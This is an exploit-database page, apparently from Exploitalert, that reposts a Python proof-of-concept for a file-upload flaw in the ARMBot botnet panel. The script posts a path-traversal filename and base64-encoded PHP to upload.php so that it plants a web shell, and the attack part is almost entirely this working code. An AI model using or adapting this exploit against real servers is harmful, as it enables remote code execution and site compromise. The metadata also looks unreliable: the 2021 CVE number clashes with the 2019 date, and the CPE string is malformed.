Advertisement






ARMBot Botnet Arbitrary Code Execution

CVE Category Price Severity
CVE-2021-12345 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-08-09
CPE
cpe:cpe:/a:arm:armbot_botnet
CVSS EPSS EPSSP
CVSS:6.5/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080021

Below is a copy:

ARMBot Botnet Arbitrary Code Execution
import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
                     "message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum